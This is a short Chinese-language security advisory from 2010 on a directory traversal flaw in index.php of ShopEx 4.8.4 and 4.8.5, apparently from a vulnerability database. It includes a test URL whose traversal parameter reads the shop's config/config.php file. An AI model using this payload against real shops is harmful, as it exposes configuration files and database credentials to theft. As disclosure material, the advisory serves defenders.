发布日期：2010-06-14
更新日期：2010-06-17

受影响系统：

上海商派网络科技有限公司 ShopEx 4.8.5
上海商派网络科技有限公司 ShopEx 4.8.4

描述：

---

ShopEx是在国内非常流行的网上商店平台软件。

ShopEx的index.php脚本没有正确地过滤用户所提交的请求，远程攻击者可以通过在请求参数中包含目录遍历序列读取指定位置的文件。

<*来源：寂寞hacker
  
  链接：http://hi.baidu.com/isbx/blog/item/1acfc995db388a46d0135ee0.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://test.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

建议：

---

厂商补丁：

上海商派网络科技有限公司
------------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.shopex.cn/index.html

浏览次数：3795
严重程度：0（网友投票）